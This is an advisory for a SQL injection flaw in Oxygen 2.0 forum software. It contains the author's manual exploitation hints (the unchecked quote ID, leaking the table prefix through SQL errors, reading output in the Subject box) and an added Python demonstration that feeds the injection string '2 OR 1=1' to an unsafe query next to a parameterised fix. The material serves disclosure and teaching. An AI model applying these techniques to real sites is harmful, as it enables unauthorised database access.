Vendor: Oxygen
By: h0yt3r
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: Oxygen
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Oxygen 2.0 SQL Injection Vulnerability
This board software does not correctly verify the quote ID variable, which is used in SQL queries. An attacker can easily get sensitive information from the database by injecting unexpected SQL queries. We need a valid topic ID. I'm not bored enough to code an exploit for this, so do it manually. By the way, it's easy to find the correct prefix for the tables by producing an SQL error. Once your query is injected, you can find the output in the Subject text box.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.
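The mitigation above, sketched as an added example (not code from Oxygen or from the advisory author): a quote lookup that pastes request values into the SQL text, next to a form that validates both IDs as integers and binds them as parameters. The table name, column names and function names are hypothetical, and an in-memory SQLite database with constructed rows stands in for the board's database.

```python
import sqlite3

def make_db():
    """Constructed sample data; the schema is an assumption, not Oxygen's own."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, topic_id INTEGER, subject TEXT);
        INSERT INTO posts VALUES (1, 10, 'Welcome'), (2, 11, 'Other topic');
    """)
    return db

def parse_id(raw):
    """Accept only a plain positive decimal integer; reject everything else."""
    if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit():
        raise ValueError("id must be a decimal integer")
    value = int(raw)
    if not 0 < value < 2**31:
        raise ValueError("id out of range")
    return value

def quote_subject_unsafe(db, topic_raw, quote_raw):
    # 'Before' form: request values become part of the SQL text itself,
    # so anything after the number is parsed as SQL.
    sql = ("SELECT subject FROM posts "
           f"WHERE topic_id = {topic_raw} AND id = {quote_raw}")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def quote_subject_safe(db, topic_raw, quote_raw):
    # 'After' form: validate first, then bind the values as parameters so
    # they can never change the structure of the statement.
    topic_id, quote_id = parse_id(topic_raw), parse_id(quote_raw)
    row = db.execute(
        "SELECT subject FROM posts WHERE topic_id = ? AND id = ?",
        (topic_id, quote_id),
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(quote_subject_safe(db, "10", "1"))
    # Post 2 is not in topic 10, yet the unsafe form still returns a row.
    print(quote_subject_unsafe(db, "10", "2 OR 1=1"))
```

The parameter binding is what closes the hole; the integer check adds an early, loggable rejection of malformed IDs before the database is touched.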